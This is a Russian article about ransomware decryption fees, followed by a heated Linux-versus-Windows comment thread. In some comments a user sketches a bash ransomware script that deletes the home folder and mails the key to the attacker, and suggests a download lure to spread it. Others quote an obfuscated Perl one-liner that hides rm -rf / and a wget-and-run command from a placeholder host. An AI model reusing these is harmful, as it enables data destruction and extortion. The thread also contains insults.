Вирус зашифровал файлы. Сколько стоит расшифровка?

Специалисты из Лаборатории Касперского опубликовали тарифы вирусописателей за расшифровку файлов: с частных пользователей от 1 тысячи рублей до нескольких десятков тысяч, с корпораций до 300 тысяч рублей.

Вирус зашифровал файлы

Суть проблемы: беззащитность Windows перед вирусами приводит к тому, что рано или поздно поклонник продукции фирмы Microsoft получает на свой компьютер вирус. Вирус может просто бесцельно размножаться, а может надежно зашифровать все данные пользователя и потребовать за расшифровку денег. Если пользователь не делает резервные копии, проблема становится весьма серьезной. Ведь при аккуратной реализации криптостойкого алгоритма шифрования, единственный способ вернуть данные — заплатить вымогателю. И никакой антивирус Касперского тут не поможет.

Ваша оценка: Нет Средняя оценка: 4.8 (6 votes)
a

Ведь при аккуратной реализации криптостойкого алгоритма шифрования, единственный способ вернуть данные — заплатить вымогателю.

Зачем такие сложности как алгоритм шифрования? Можно же просто зашифровать xor-ом со случайным вектором, выпросить денег, если дали, то повторять просьбу платёж повторить под различными предлогами и не высылать ключ. Алгоритм элементарен, ничего хранить не надо, лохов можно развести не однократно.

Да и вообще эта какая-то бредовая идея платить преступнику, не имея гарантий получения результата.

Ваша оценка: Нет Средняя оценка: 3.8 (4 votes)
11
pomodor

А как же лояльность клиента? Если обмануть, в следующий раз бабки уже не отправит.

Ваша оценка: Нет Средняя оценка: 3.3 (4 votes)
a

>Можно же просто зашифровать xor-ом со случайным вектором,
Вы идиот, не пишите больше.

Ваша оценка: Нет Средняя оценка: 1 (1 vote)
a

беззащитность Windows перед вирусами приводит к тому, что рано или поздно поклонник продукции фирмы Microsoft получает на свой компьютер вирус.

Бред сивой кобылы. С момента появления подобного дерьма в этих ваших интернетах я множество раз сталкивался с подобной оказией. Во всех случаях за компом сидели либо тупые п^зды, либо школьники-дебилы. От адекватных людей, которые не тыкают курсором без памяти куда ни попадя жалоб не поступало. Более того, у этих людей нет даже агрессивных adware, которых нынче более чем достаточно.
Причиной 99% проблем с компом и целостностью данных является не операционная система, а прокладка между стулом и клавиатурой.

Ваша оценка: Нет Средняя оценка: 2.8 (10 votes)
11
pomodor

Да, поклонник вантуза он такой: и ребенка дебилом обзовет, и женщину оскорбит, лишь бы выслужиться перед своим анальным покровителем. ;)

Ваша оценка: Нет Средняя оценка: 3.8 (8 votes)
a

Мне, стало быть, следует Вас называть красноглазым упоротым луноходом? Вам не кажется, что Вы неправы? Нельзя оскорблять человека, о котором Вы ничего не знаете. Сам я, кстати, готов извиниться за фразу "Бред сивой кобылы" если вот это: "...беззащитность Windows перед вирусами приводит к тому, что рано или поздно поклонник продукции фирмы Microsoft получает на свой компьютер вирус." — Ваши личные мнение/выводы/умозаключение. Надеюсь, что нет, ибо писавший эту глупость соскочил в лучшем случае с семёрки, в худшем — с XP и особыми знаниями этих систем не отличается. Про более новые окна я и не говорю. Ни разу на Win 8.1 upd 3 со всеми последними обновлениями случаев описанного в Вашей статье залёта не возникало.
Я на MS ещё со времён DOS 5.0, в этом году 25 лет как, знаю все версии мелкомягких систем вдоль и поперёк. Так обожаемой Вами системой совершенно не брезгую, даже наоборот, хоть и не знаю её столь хорошо, как продукты MS. Просто в качестве основной на десктопе она мне не подходит, ибо не способна выполнять необходимые мне задачи. Неспособна в принципе. Софт специфический и узкозаточенный, существует только под Win, хотя один из его подвидов, есть в двух ипостасях: фронт — под Win, а сервак под линух.
А людям, никак не связанным с :
— госотчётностью, банк-клиентами — без ActiveX компонентов они не работают и криптопровайдера под *nix нету, в виртуалке эта херь не робит, нужны физические порты для ключей криптозащиты;
— Excel-простынями с многостраничными обработками на VBA — никто не будет переписывать десятки тысяч строк кода под LiO basic;
— задротством в ММОРПГ, и прочей поебенью — сам не играю и помочь в этом никак не могу;
— айТюнс-завимостью — это диагноз и лечению поддаётся с трудом, лень переубеждать;
— MS-пристрастием и заведомой неприязнью к иным системам — см. предыдущий пункт;
я и советую и устанавливаю именно линукс. Мне так проще, им так проще. Клиент счастлив, всё работает, рекомендации, бабло.

По поводу Вашего замечания — ни женщины, ни тем более дети не имеют никакого отношения к категориям граждан, указанных мною в предыдущем посте.

А ТП и дебилы не имеют пола и возраста. Посмотрите на тех, кто:

1) Даёт объявлениям типа «Скорая компьютерная помощь ООО «Хакер Плюс с выездом на дом";
2) От имени и по поручению этих контор бегают на вызовы;
3) Является клиентами подобных лохотронов.

В последнем случае — ТП и школьники-дебилы, а в первых двух — бывшие школьники, но с возрастом так и не поумневшие. Хотя в первом случае таки да, малость поумневшие и хитрожопые, ибо доить лохов — тупому не под силу.

Ведь спасение компьютеров от криворукости хозяев — это один из моих источников дохода и, глядя на этих, блджад, «конкурентов» и плоды их рукоблудства я просто х~уею, лучше бы они вообще них*я не делали, чем так, как они умеют . Так что своего мнения об этой категории людей я никогда не изменю по вполне объективным причинам.

Спасибо за внимание.
Извиняюсь за возможную сумбурность изложения мыслей.
Всего Вам доброго.

Ваша оценка: Нет Средняя оценка: 4 (6 votes)
a

И что? Элементарно делается под линуксом. Всего-то пара десятков строк на том же bash. Всё что требуется — запихнуть в популярное место под видом темы к гному/кде, либо порт какого-нибудь сталкера:) Уверенный в неуязвимости линукса лошок и пароль рута введёт если надо будет для заражения, и ислам примет, и танец маленьких свиней спляшет — только бы завелось.

Ваша оценка: Нет
8
dk

Ну против дурака с инициативой (в данном случае — с админскими правами) любая система бессильна. Не делать же систему с идеологией "Ты юзер настолько дурак, что даже на твоем компьютере мы тебе рулить не дадим"? Хотя, по сводкам с полей...

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
a

Макось?

Ваша оценка: Нет
a

Да и без админских прав всё прекрасно шифруется. Доступ к домашнему каталогу на чтение и запись есть? Есть. Ну а большего и не требуется чтобы лежащие там фотки кошаков и корпоративов пострадали вместе со всякими курсовыми и шансончиками. В /etc или /usr/bin ничего не запишется, ясный пень, — но оно и не нужно, юзер и так копеечку отдаст:) Если /home лежит на отдельном разделе и смонтирован с noexec и nosuid — задача малость усложняется, но всё равно разрешима.

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
6

А вы пробовали, так просто как говорите — это самое сделать на удаленном хосте или сервере?

Ваша оценка: Нет
a

OpenSSL в большинстве дистров установлен по умолчанию, значит сгенерить ключи и зашифровать файлы есть чем:) А дальше — никаких проблем.

#/bin/bash
tar -cvjf /tmp/home.tar.bz2 ~/*
rm -rf ~ # Содержимое хомяка упаковано в /tmp/home.tar.bz2, исходные данные уничтожены.
openssl genrsa -out ~/private.pem 2048
openssl rsa -in private.pem -out ~/public.pem -outform PEM -pubout
cat private.pem | sendmail мыло хакера
# закрытый ключ шифрования хакеру улетел на мыло. Можно и через ftp пнуть, или ещё как.
openssl rsautl -in /tmp/home.tar.bz2 -out ~/encrypted -inkey ~/private.pem -pubin -encrypt
rm ~/*.pem
rm /tmp/home.tar.bz2
echo Твои файлы зашифрованы, если они тебе нужны — пиши мне на мыло.
exit

Файлец сохраняем, создаём сайт, выкладываем скрипт туда. Пишем на глагне "Чувак, тебе в линуксе фотошоп нужен? А старкрафт? A голый Путин? Если да — качни этот файл, в наутилусе или какой там у тебя файлменеджер поставь ему право на исполнение и запусти". Всё, убунтята поведутся толпами:) Естественно код в том виде как я написал не сработает (ибо нефиг) — это чисто демонстрация идеи. Кому не нравится шифровать через openssl — может с помощью gpg то же самое запустить, суть не меняется.

Ваша оценка: Нет Средняя оценка: 3.5 (2 votes)
6

А зачем, писать то, что не сработает! Где же истина? Написали бы реальный скрипт со 100% эффективностью, детишки бы размяли пальцы, антивирусные компании выпустили бы свои пакеты приложений предотвращения новой угрозы!?:) Всем польза была бы...А так, сложно сублимированные данные никому не помогут!:( Время потеряли и пользователя заставили терять свое!

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
a

Мне оно надо — лишать школьников копеечек, которые им мама на обед дала?:) Вместе с иллюзиями о неуязвимости линукса. Ещё 2003 году на Linux.org.ru появилась провокация: автор опубликовал «программу из одной строчки на Perl» и попросил подсказать, почему она не работает:

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'

Эта программа на поверку оказалась хорошо замаскированным rm -rf /. При попытке запуска её из аккаунта root пользователь мог поплатиться всеми подмонтированными с возможностью записи файловыми системами.

Ваша оценка: Нет
9
comrade

А если бы такого типа пользователь просто тупо напился и выкинул бы свой компьютер с 16 этажа? По-вашему опять получится, что линукс виноват?
(...Довёл проклятый, не вынесла душа поэта;-)

____________________
И в Вашей любимой солярке разве какой-то другой

rm -rf /

?(-:

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
a

На солярке права рута можно ограничить вообще-то. В 10 версии эта возможность появилась. За счёт зон (нечто вроде линуксового chroot или фришного jail, только сделанное по уму) и разбиения рутовых привилегий на базовые права, не все из которых доступны через su или тому подобный механизм.

Ваша оценка: Нет Средняя оценка: 1 (2 votes)
6

Хм, Великая Solaris v.10!-;)
И множество удаленных дыр в 2014 году(24.11.2014), типа
CVE ID:
CVE-2014-3466
CVE-2014-3467
CVE-2014-3468
CVE-2014-3469
(Отказ в обслуживании, Обход ограничений безопасности, Компрометация системы ), с вектором эксплуатации: удаленно! Даже эксплойт, не нужен был!:)
И после этого, очень сложно говорить, что она безопаснее Linux OS!?

Ваша оценка: Нет
a

Какой Linux? Слака? Арч? Убунта? Красная шапка? При существующем зопарке из 100500 дистров если находится дырка к примеру в yast, то не использующие эту ненужную штуку особо не страдают, зато дырочка в ядре или glibc — и в очередной ботнет отправляются все:) Так что линукс безопаснее только в случае предвзятого подсчёта типа "это убунтовская дырка, мою мандриву она не касается". А эксплойт и на линуксе не всегда нужен: помню я дырку в gnome-screensaver, из-за которой он благополучно падал если кнопку Esc нажать и подержать пару секунд. Результат: вводить пароль чтобы гномовскую сессию разблокировать на чужом компе было абсолютно незачем, как и заморачиваться с его подбором:) Дырка третьегномовская, а он кроме линукса нигде не водится и потому можно считать чисто линуксовой.

Ваша оценка: Нет
8
dk

А эксплойт и на линуксе не всегда нужен: помню я дырку в gnome-screensaver, из-за которой он благополучно падал если кнопку Esc нажать и подержать пару секунд. Результат: вводить пароль чтобы гномовскую сессию разблокировать на чужом компе было абсолютно незачем, как и заморачиваться с его подбором:) Дырка третьегномовская, а он кроме линукса нигде не водится и потому можно считать чисто линуксовой.

Это получается что для использования:
1. Нужен физический доступ к компьютеру и главное
2. Третьегном, который хоть и водится на линуксах, но далеко не на каждом. (Кстати а разве на BSD его не было?).

Ваша оценка: Нет
6

Я писал, о OC на базе ядра Linux, не имея в виду определенные дистрибутивы!

помню я дырку в gnome-screensaver

, Вы про это что ли:
"В библиотеке libpng обнаружена уязвимость, которая может привести к выполнению кода злоумышленника или получению доступа к области памяти приложения, в момент обработки специальным образом скомпонованного PNG изображения..."?
Или, про:
1. Incorrect input validation in PyString_FromStringAndSize() leads to multiple buffer overflows;
2. Gentoo update for gnome-screensaver.

Ваша оценка: Нет
a

Компания "Доктор Веб" сообщила о выявлении вредоносного ПО Linux.Encoder, шифрующее файлы на серверах и требующее заплатить деньги за расшифровку. Программа распространяется в форме троянского ПО для Linux и FreeBSD, требуя для своего размещения эксплуатации неисправленных уязвимостей в серверном ПО или в web-приложениях.

Безопасный линукс такой безопасный, чо.

Ваша оценка: Нет Средняя оценка: 1.5 (2 votes)
a

а где эти вирусы, я за много лет не поймал ни одного? Хоть кто нибудь из посетителей сайта у кого был опыт расскажите как вы словили вирус, что это был за файл и каким образом его запустили (произошло заражение). Честно без всякого сарказма, мне просто интересно.

Ваша оценка: Нет
a

Не поймали или думаете, что не поймали?:) Хотя если дурвеб не врёт, то заражение такой штукой сложно не заметить. У меня вот под виндой тоже почему-то вирусы не особо попадаются, как бы линуксоиды ни истерили и ни запугивали: последний года 4 назад на чужой флешке видел, да и то его подлый Symantec Endpoit Protection грохнул раньше чем запуститься успел. Может потому что на файлопомойках краки для фотошопа не ищу и всякие ZverCD не испольую?

Ваша оценка: Нет
a

вирус шифрует дохрена всего — как можно не заметить? :)) Ну я не конкретно про этот вирус спрашиваю потому что написан специально для серверов, и не знаю как на русском, на оффициальном сайте сказанно нужны права админа:

Once launched with administrator privileges, the Trojan loads into the memory of its process files containing cybercriminals' demands:

а на винде схлопотать вирусняк проще простого, по моему опыту пользователи чаще всего попадаются на самораспаковывающиеся архивы экзешники, и скрытое расширение файла тоже наруку кулхацкеру.

Ваша оценка: Нет
a

Ну я не конкретно про этот вирус спрашиваю потому что написан специально для серверов, и не знаю как на русском, на оффициальном сайте сказанно нужны права админа:

Насчёт того что написано это дело специально для серверов — неправда, с десктопной машиной тоже сработает на раз. И если угробленную /var/lib я и с инсталляционного диска оживлю, то с /home всё куда интереснее:) Рутовые права без проблемы получаются через эксплойты, которых для линукса не сильно меньше чем под винду, после чего всё нужное спокойно жертве удалённо закачивается и запускается.

а на винде схлопотать вирусняк проще простого, по моему опыту пользователи чаще всего попадаются на самораспаковывающиеся архивы экзешники, и скрытое расширение файла тоже наруку кулхацкеру.

Да и под линуксом запросто после того как выйдешь за пределы огороженной автором дистра свободки и в стандартных репах нужной софтины не окажется:). Лезешь читать форумы и для всяких убунт с дебианами видишь совет: подключи стороннюю репу и поставь из неё то-то и то-то. Чем это по сути отличается от виндового качания с торрентов по существу? На GNOME-Look в своё время троянца под видом скринсейвера сунули и пипл благополучно схавал.

Ваша оценка: Нет
8
dk

неправда, с десктопной машиной тоже сработает на раз.

Это, кстати, да — народ тоже удивлялся, как данный вирус сервер от десктопа отличать должен :)

И если угробленную /var/lib я и с инсталляционного диска оживлю, то с /home всё куда интереснее:)

И нафига козе баян exec на /home?

Чем это по сути отличается от виндового качания с торрентов по существу?

Ну если это репозиторий программы — то тем, что ты качаешь пакет напрямую от автора, а не неизвестно кем собранный и допиленный exe в торренте. Другой вопрос — доверяем ли мы автору — но тут уж каждый ССЗБ.

Ваша оценка: Нет Средняя оценка: 5 (2 votes)
a

Зачем для шифрования /home там exec-то нужен? wget -c -P /tmp www.левый адрес.com/troyan.sh && sh /tmp/troyan.sh — и вот оно, счастье.

Ваша оценка: Нет
8
dk

Пардон про exec уже говорили — http://liberatum.ru/exclusive/virus-zashifroval-fajly#comment-53340

Ваша оценка: Нет
8
dk

https://vms.drweb.ru/virus/?i=7703983&lng=ru

После запуска с правами администратора троянец загружает в память своего процесса файлы с требованиями вирусописателей:

Это получается, что его надо
1. Положить на сервер.
2. Запустить от рута.

Неплохие требования.

Ваша оценка: Нет Средняя оценка: 5 (3 votes)
a

Либо поиметь рутовые права через одну из 100500 дырок в shell, ядре, openssl или ещё где-то. Разве нет?

Ваша оценка: Нет Средняя оценка: 1 (2 votes)
a

поиметь это волшебное слово, для этого надо имелку хорошую иметь. 100500 дырок — так это все сервера в мире падали бы через несколько минут после запуска. Кроме сообщения что появился вирус ничего другого не слышно

Ваша оценка: Нет
a

Да не нужна хорошая имелка. Нужен nmap и база эксплойтов. И то и другое общедоступно. Или под линем ботнетов не было никогда?

Ваша оценка: Нет
9
comrade

Лично не раз пользовался для лечения виндовсов антивирусниками дрвеба и касперского, которые для запуска используют линукс.

Но уважаемый оппонент, как самый умный в здешней песочнице, конечно же, немедленно приведёт 100500 примеров антивирусных систем, предназначенных для лечения линукса (да ещё и на виндовсе сделанных;-).

Ваша оценка: Нет
a

Лично не раз пользовался для лечения виндовсов антивирусниками дрвеба и касперского, которые для запуска используют линукс.

LiveCD? Ну да, есть такие. Лечат они или калечат — другой вопрос, доводилось потом файловую систему пару раз чинить у клиентов по причине того, что обращение к виндовым дискам в этих LiveCD шло через ntfs-3g — то ещё дерьмище.

Но уважаемый оппонент, как самый умный в здешней песочнице, конечно же, немедленно приведёт 100500 примеров антивирусных систем, предназначенных для лечения линукса (да ещё и на виндовсе сделанных;-).

А на это я отвечу любимым линуксовым аргументом когда речь идёт о чём-то в лине напрочь отсутствующем:) Нинужен. Сколько там линуксов на десктопе — от процента до полутора если быть очень уж оптимистичным? Сколько из них готовы платить за это дело? Для серверных же решений на базе линукса антивирусные продукты точно не в дефиците: Avira, Symantec, Dr.Web, каспер и куча других.

Ваша оценка: Нет Средняя оценка: 1 (1 vote)
9
comrade

«Для серверных же решений на базе линукса антивирусные продукты точно не в дефиците: Avira, Symantec, Dr.Web, каспер и куча других.»
— Которые, прежде всего, используются для проверки всякого прокачиваемого виндозного говна – в письмах и трафике.
========
Ну, и понятно, что у др.веба и касперского нет великого Вас, а сидят недоучки всякие, вместо грамотных спецов-программистов. Вот и выбрали для LiveCD вместо надёжнейшей системы какое-то недоразумение, которое "компьютеры калечит".
(-;

Ваша оценка: Нет
a

— Которые, прежде всего, используются для проверки всякого прокачиваемого виндозного говна – в письмах и трафике.

То есть ваш хламClam неспособен даже на такое?:)

Вот и выбрали для LiveCD вместо надёжнейшей системы какое-то недоразумение, которое "компьютеры калечит".

Десяток лет назад вместо убогого ntfs-3g в линуксе была нормальная, хотя и малость тормознутая приблуда для работы с NTFS. Не калечившая диски, корректно работавшая с расширенными атрибутами, сжатием и прочими файловыми потоками. Captive NTFS — не знаю, слышали про такое или нет. captive-1.1.7 от 2006-01-26 была последней версией. Про парагоновский драйвер NTFS для линукса ничего не скажу — не имел с ним дела. NTFS-3G и штатный драйвер NTFS в ядре линукса — дерьмо.

Ваша оценка: Нет
6

что обращение к виндовым дискам в этих LiveCD шло через ntfs-3g — то ещё дерьмище.

Дермище-то, называются костылями (ntfs-3g) для работы с дерьмом в виде, ntfs!
:)
Так вирусов, не требующих установки права root, не много..., где-то в районе сотни в экосистеме Linux, в отличии от безбрежного океана в миллиарды — под Windows, ибо 90 % пользователей, вообще не соображают в области вирусных аспектов технологий применяемых в быту!

Ваша оценка: Нет
a

Дермище-то, называются костылями (ntfs-3g) для работы с дерьмом в виде, ntfs!

То-то на лоре, опеннете и англоязычных ресурсах оптом рыдают что нормальную файловую систему хотят вместо ext*, а её всё нет и нет:) Reiser4? Вряд ли взлетит. BTRFS? С 2007 пилят серьёзные люди вроде Oracle, но до стабильного состояния так и не довели. ZFS? Лицензия не позволяет прямо в ядро воткнуть — только модулем и так по всем пунктам. Чтобы даже безнадёжно устаревшую NTFS качественно угробить — надо или линукс, или дефектное железо, всё остальное она переживёт:) Про идущую ей на замену и вполне юзабельную на прямо сейчас ReFS я вообще молчу, в линуксе даже аналога нет.

Так вирусов, не требующих установки права root, не много..., где-то в районе сотни в экосистеме Linux, в отличии от безбрежного океана в миллиарды — под Windows, ибо 90 % пользователей, вообще не соображают в области вирусных аспектов технологий применяемых в быту!

Пользователь, чей хомяк был угроблен не от рута конечно же неимоверно обрадуется этому факту:) Подумаешь — семейные фотки за 20 лет погибли вместе со всякими диссертациями, зато враг ничего в /usr/sbin не смог записать, вендекапец близок как никогда! А не соображающие виндуятники вообще-то или учатся, или к соображающим обращаются на тему как и что замутить дабы не пострадать.

Ваша оценка: Нет
6

на лоре, опеннете и англоязычных ресурсах оптом рыдают что нормальную файловую систему хотят вместо ext*

Знаю такую, от легендарной IBM — JFS, называется:)
Личный опыт, на работе в гос.конторе в далеком уже 2006 году, стояло два PC:
— один, рабочая станция от IBM (1995 года выпуска) - на двух разделах jfs, так с ней, после отключения электросети, никогда не было проблем с файловой системой (он не обслуживался 10 лет, до моего прихода...), работал 10 лет без UPS!
— второй, сервер на Windows 2003, все тома под ntfs - в один плохой день, для меня и пользователей, а это отдел гидрологии одного из республиканских центров по мониторингу окружающей среды сгорел UPS и потом рухнула ntfs. В итоге остался без выходных и 40 часов восстанавливал архивные данные с 1980 года включительно! И это всего за 3 года — называется почувствуйте разницу...
:(

Ваша оценка: Нет
a

Знаю такую, от легендарной IBM — JFS, называется:)

JFS и я знаю. По OS/2 4.5, она же Aurora. Поскольку особого впечатления на меня по сравнению с HPFS386 не произвела, на линуксе особо не смотрел.

в один плохой день, для меня и пользователей, а это отдел гидрологии одного из республиканских центров по мониторингу окружающей среды сгорел UPS и потом рухнула ntfs.

Железячная проблема, как и говорил. Думаете, ext4, xfs, btrfs и что там ещё сейчас модно, стильно, молодёжно такое бы успешно победили? Рыданий про погибшую reiserfs к примеру я столько наслышался, что век помнить буду:)

Ваша оценка: Нет
a

какие еще ботнеты — имеете в виду ту новость, где использовалась уязвимость рутеров по причине слабых паролей и брута? Раз вы такой матерый админ приведите пример рабочего экплойта который сработает сейчас без проблем на моей машине — поставлю винду и забуду о линухе

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
a

Не роутеры, так не роутеры. Слова для гугления: "linux botnet BillGates". Плачи пострадавших можно найти на forums.debian.net к примеру. CentOS тоже под раздачу попадала.

Ваша оценка: Нет Средняя оценка: 2 (2 votes)
9
comrade

Т.е., Вы нам рассказываете, что нехорошо запускать непонятно какие программы, скаченные неизвестно откуда? Полностью с Вами согласны!

Кстати, для пользователей какой системы такое поведение более характерно?... (-;
(И идеология, принципы и возможности какой системы этому способствуют?)

Ваша оценка: Нет
a

Кстати, для пользователей какой системы такое поведение более характерно?... (-;
(И идеология, принципы и возможности какой системы этому способствуют?)

Убунту. Радостная школота, начитавшись про неуязвимость линукса и полное отсутствие под него всяких троянов и вирусов ордами ломится качать и запускать всё что видит.

Ваша оценка: Нет Средняя оценка: 2 (2 votes)
9
comrade

Ну и где же они – эти орды "заряженных"? ((-:

Ваша оценка: Нет
a

А как среднестатистический убунтёныш или федораст поставивший нехорошее с левой репы сможет обнаружить, что его поимели? Я серьёзно интересуюсь. Если порнобаннера на весь экран не будет, то так и продолжит считать что ему сухо и комфортно. Антивирь? Не нужен, вирусов в линуксе нет:) Файрволл уровня приложений, который заорёт "Эй, начальник, у тебя какой-то левый бинарник по непонятному адресу в инет лезет — пустить или нет?" Не, не слышали про такое. Это в насквозь небезопасной винде при дефолтных настройках антивирь в комплект входит, файрволл предупреждает что левая программка сервером поработать захотела, а UAC предупреждает что найденный в просторах инета заменитель блокнота при запуске админские права почему-то захотел.

Ваша оценка: Нет
9
comrade

Виндовсовкие ноутбуки продают, обычно, с каким-нибудь триальным "нортоном", который через месяц отрубается и болтается мёртвым грузом, прося денег.
А встроенный антивирус при этом не заводится, т.к. другой антивирус не убран.

Кстати, встроенный антивирус добавлен аж в виндовсе 8, т.е. через 20 лет "безопасной" истории виндовса;-)

Пароль администратора, который по умолчанию требуется в линуксе, всё-таки надёжнее чем UAC. Т.к. виндозные пользователи более дикие, и просто привыкли жать Да-Да-Да...

Виндозный фаервол, с умолчальными настройками, ведёт себя как тихая мышка – его не видно и не слышно. Главное, чтобы пользователи не жаловались – что у них "интернет как-то не так работает"(-;

Ваша оценка: Нет Средняя оценка: 5 (2 votes)
a

Виндовсовкие ноутбуки продают, обычно, с каким-нибудь триальным "нортоном", который через месяц отрубается и болтается мёртвым грузом, прося денег.
А встроенный антивирус при этом не заводится, т.к. другой антивирус не убран.

Без проблемы сносится. У Symantec, каспера, F-Secure и других серьёзных разрабов с офсайта легко качается деинсталлятор если стандартный метод (через "Программы и компоненты" в панели управления) не работает или работает неправильно.

Пароль администратора, который по умолчанию требуется в линуксе, всё-таки надёжнее чем UAC. Т.к. виндозные пользователи более дикие, и привыкли жать Да-Да-Да...

С фига ли более дикие? Они-то как раз знают что такое вирусы и что не стоит запускать что попало если тебе твои рефераты и фотки с корпоратива нужны незашифрованными. А вот линуксоиды рутовые пароли как раз и долбят при каждом чихе — безопасная система же:)

Виндозный фаервол, с умолчальными настройками, ведёт себя как тихая мышка – его не видно и не слышно. Главное, чтобы пользователи не жаловались – что у них "интернет как-то не так работает"(-;

Тихо как мышка он себя ведёт до тех пор пока запущенная и отсутствующая в его правилах софтина порт для входящих подключений не откроет дабы сервером поработать. Исходящие соединения он особо не отслеживает и тут Вы правы. Но разве линуксовый iptables себя в этом вопросе ведёт хоть чуть лучше? Равно как фряшный или опеночный pf.

Ваша оценка: Нет
6

Уважаемый, что за подход гопника? Всякие пацанчики и фраеры Вам жить не дают, видно...

среднестатистический убунтёныш или федораст поставивший нехорошее

А хотя, ладно буду с вами на вашем же диалекте субкультурном, разговоры разговаривать:
1. виндовозный "хомячок", ничего порой знать не хочет — о правильной настройки firewall and antivirus — максимум скачать и нажимая "всего ОДНУ кнопочку" его установить, а потом через пару дней, или как повезет в его жизни, словить закриптованный троян или всякую малварь!
2. А где, по умолчанию в Windows XP/7/8 -входят по умолчанию, вместе с системой антивирусные приложения, которые уровня коммерческих продуктов, тех же Norton, Dr.Web и т.д.?

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
a

Уважаемый, что за подход гопника? Всякие пацанчики и фраеры Вам жить не дают, видно...

Не менее уважаемый, а Вы почитайте перлы здешних типа линуксоидов — будете неприятно удивлены тем, что на их фоне я просто образец интеллигентности и вежливости. В теме про убунту 15.10 хотя бы или в любой про Win10. Ссылок не даю, поскольку незарегистрированным пользователям не положено — но места для поисков я подсказал.

виндовозный "хомячок", ничего порой знать не хочет — о правильной настройки firewall and antivirus — максимум скачать и нажимая "всего ОДНУ кнопочку" его установить, а потом через пару дней, или как повезет в его жизни, словить закриптованный троян или всякую малварь!

Как и линуксоидные хомячки. Думаете тут много народу способно самостоятельно написать правило для iptables, запрещающее конкретному приложению лезть в инет по конкретным адресам или что-то подобное? Или я эту публику не знаю? О, поставил я убунту, получил +100500 к ЧСВ и три раза по столько к понтам:) Понтоваться надоело через час, захотел в какую-нибудь Modern Warfare поиграть между уроками — опаньки, нет такого в моём центре приложений, жизнь — боль:( Полез в гугл, нашёл там про какой-то wine, не осилил. А тут раз — и посоветовали добрые люди на убунтовском или аналогичном форуме: друг, ты терминал запусти, sudo su root в нём набери, потом свой пароль введи (а в убунте и возможно всяких минтах этого для счастья хватит:) и скопируй туда вот эти десяток строк. Конец немного предсказуем.

А где, по умолчанию в Windows XP/7/8 -входят по умолчанию, вместе с системой антивирусные приложения, которые уровня коммерческих продуктов, тех же Norton, Dr.Web и т.д.?

Там же, где и в линуксе, очевидно. Уж на что стандартный Windows Defender убог, но он куда лучше линуксового же дефолтного clam (если clam в данном конкретном дистре вообще устанавливается по умолчанию, что сильно не факт).

Ваша оценка: Нет
6

Это хорошо, что я вижу уважение у пользователя Windows! Честно...

способно самостоятельно написать правило для iptables

, попробуйте ради личного эксперинса: GUI в виде: "настройка межсетевого экрана" в Ubuntu? Для среднестатистического "хомячка", там легкая настройка и портов и протоколов основных, честно подсказал сейчас Вам!

Понтоваться надоело через час, захотел в какую-нибудь Modern Warfare поиграть между уроками

, так Steam в помощь, несколько сотен игр, из них десятки ААА-класса? Или этого мало...для человека не подсевшего на игровую фобию...

и посоветовали добрые люди на убунтовском или аналогичном форуме:

Так для этого и нужен мозг у хомячков, а не говно, чтобы не запускать или чтобы хотя бы забить команду копипастом, в любой поисковик и прочитать в 10-ке топов, что это означает!?

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
a

Это хорошо, что я вижу уважение у пользователя Windows! Честно...

Если быть справедливым, то основная масса зарегистрированных тут хоть линуксоидов, хоть виндузятников — люди адекватные и вменяемые. Мат и прочее идут в основном от анонимусов. Поскольку анонимных линуксоидов тут бывает больше, то впечатление от ресурса немного предсказуемо, тем более здешние модеры судя по всему трут комменты только со стороны наших.

, попробуйте ради личного эксперинса: GUI в виде: "настройка межсетевого экрана" в Ubuntu? Для среднестатистического "хомячка", там легкая настройка и портов и протоколов основных, честно подсказал сейчас Вам!

Мне не нужно, я правила для iptables уже давно привык руками писать:) Спасибо начальству за сервак на Scientific linux, на котором крутится пыхпых, апач, слон и прочая мелочь. Но опять же это не решает глобальных проблем netfilter, про которые я говорил. Во-первых он не интерактивен и если отсутствующая в его списках софтина сетевое соединение откроет — он её не тормознёт чтобы спросить у пользователя как поступить. Во-вторых он не всегда позволяет фильтровать трафик по имени команды, а PID — критерий ненадёжный: запустил я софтину — он один, закрыл и запустил снова — другой. Можно, конечно, соорудить конвейер из ps, grep и iptables, чтобы к примеру запущенное прямо сейчас в Wine за пределы 192.168.0.1/16 не вылезло или пересобрать ядро чтобы iptables в цепочке OUTPUT аргумент --cmd-owner понимал — но вряд ли это сделает гуёвый конфигуратор или среднестатистический хомячок руками:)

, так Steam в помощь, несколько сотен игр, из них десятки ААА-класса? Или этого мало...для человека не подсевшего на игровую фобию...

А если для счастья нужна конкретная игра, в стиме напрочь отсутствующая? Или без нативного линуксового порта, зато отказывающаяся запускаться в Wine? Либо с отстойнейшей линуксовой версией? Чтобы "Ведьмак 2" на линуксе заработал — разрабам пришлось в ядро изменения внести, помнится, и всё равно работало через раз и через задницу:)

Так для этого и нужен мозг у хомячков, а не говно, чтобы не запускать или чтобы хотя бы забить команду копипастом, в любой поисковик и прочитать в 10-ке топов, что это означает!?

А вот тут у винды и преимущество: команд меньше:) Значит и выучить проще. Правда с развитием PowerShell, не уступающему по крутизне всяким bash и zsh ситуация ухудшится.

Ваша оценка: Нет Средняя оценка: 3 (1 vote)
6

Лично,сейчас поставил вашему комментарию — 3 звезды, ибо правильно!
1. Анонимов уважаю, ибо с 2010 лично поддерживал "великий" THE PLAN!
:)
2. в своей деятельности лично учу пользователей, как и Linux, а также Windows, при проблемах — сначала думать головой, а потом касаться ручками клавы,...сам пользуюсь, только при проблемах — терминалом в Linux, а в быту только GUI!
:)
3.

для счастья нужна конкретная игра

, увы, что есть — то есть... но это первая проблема издателей и разработчиков, а потом тех, кому для физического или морального счастья, необходимо конкретное игровое приложение!
:(
4.

вот тут у винды и преимущество: команд меньше:) Значит и выучить проще

Согласен и тут, но какой ценой — проще?
До 2009 года пользовался на работе и дома только Windows (от 95 и до Vista), реально бэкапил до 8 DVD, c образами системы и софтом, постоянно искал стабильные версии приложений и тратил кучу времени на это...!
Теперь же — уже 6 лет, у меня всего три бэкапа — в три месяца, один в облаке mega, второй на личном сервере в USA, третий на внешнем USB SSD!
